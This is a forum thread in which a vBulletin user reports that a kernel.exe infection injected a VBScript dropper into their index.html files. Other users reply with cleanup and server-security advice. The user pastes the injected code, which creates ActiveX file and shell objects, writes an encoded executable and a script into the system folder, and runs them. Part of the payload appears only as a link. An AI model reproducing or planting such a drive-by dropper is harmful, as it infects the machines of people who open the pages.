Omg, Virus code in Vbulletin files.

[Mean]

Last week, my computer has infected from kernel.exe virus.
I removed that, but now i shocked. It puts this code all index.html pages
in Vbulletin folder in my desktop ?

It put this code to

includes/index.html
images/index.html
clientscript/index.html
etc.

Code:

<script language=vbscript>
on error resume next
fileexe1="077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000184000000000014031186014000180009205033184001076205033084104105115032112114111103114097109032099097110110111116032098101032114117110032105110032068079083032109111100101046013013010036000000000000000000000212036142028144069224079144069224079144069224079030090243079135069224079108101242079147069224079082105099104144069224079"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>

I think maybe the problem of this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

from that virus code ?

I am very shocked of that ..

The full code is this. (I couldnt paste the full code because it is about 24.500 characters)
http://rapidshare.com/files/45994675/kernelcode.html

[EnIgMa1234]

This is not default vb code as the index.html are empty. Someone put that there

[Mean]

Quote:

Originally Posted by EnIgMa1234

This is not default vb code as the index.html are empty. Someone put that there

Yes, of course. But is there anyway to get rid of that ?

[EnIgMa1234]

Find out who put it there. Have you downloaded any 'dodgy files' lately?

Delete those files also

[da420]

Quote:

Originally Posted by Mean

Yes, of course. But is there anyway to get rid of that ?

Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definately be looked into.

[Mean]

Quote:

Originally Posted by da420

Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definately be looked into.

I removed that virus by reading this
http://www.spywareremove.com/removekernelexe.html

Maybe after

It put the codes to Vbulletin Folder in my desktop.

When i got this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

error, i uploaded vbulletin files from desktop to web, and i have seen that.